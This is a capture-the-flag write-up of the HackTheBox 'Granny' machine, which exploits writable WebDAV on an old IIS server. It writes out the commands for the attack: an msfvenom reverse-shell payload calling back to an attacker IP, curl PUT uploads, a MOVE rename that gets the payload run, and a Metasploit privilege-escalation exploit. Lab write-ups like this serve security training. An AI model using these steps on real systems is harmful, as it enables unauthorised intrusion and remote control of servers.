HackTheBox - Granny

Nmap scan results (Basic and all port)

Let's edit the /etc/hosts file and add granny.htb to it.

So the IIS Web server is very old (2003). You can search for it on google.

Gobuster scan results

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://granny.htb/ -t 20 -o gobuster-dir-scan.out

Nmap also scanned the webpage with http-webdav-scan script. We can use a tool named davtest.

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

Performing Davtest scan

The nikto scan says that the clients can UPLOAD or DELETE files on the web server.

Let's try to upload a simple html file.

curl -X PUT http://10.10.10.15/hello.html -d 'This is the file that I uploaded'

Generating reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx

We can't upload a .aspx file, but we can upload a .html file

curl -X PUT http://10.10.10.15/shell.html -d @shell.aspx

We can use HTTP MOVE method to upload a .aspx file. Read more about here.

This thing will move the file shell.html to shell.aspx and using this, we can finally execute the file and probably get a shell.

Running Exploit Suggester from msfconsole

Background the session using background command and search for exploit suggester

This module will search for local exploits and we can use that to escalate our privileges.

Using exploit/windows/local/ms15_051_client_copy_image exploit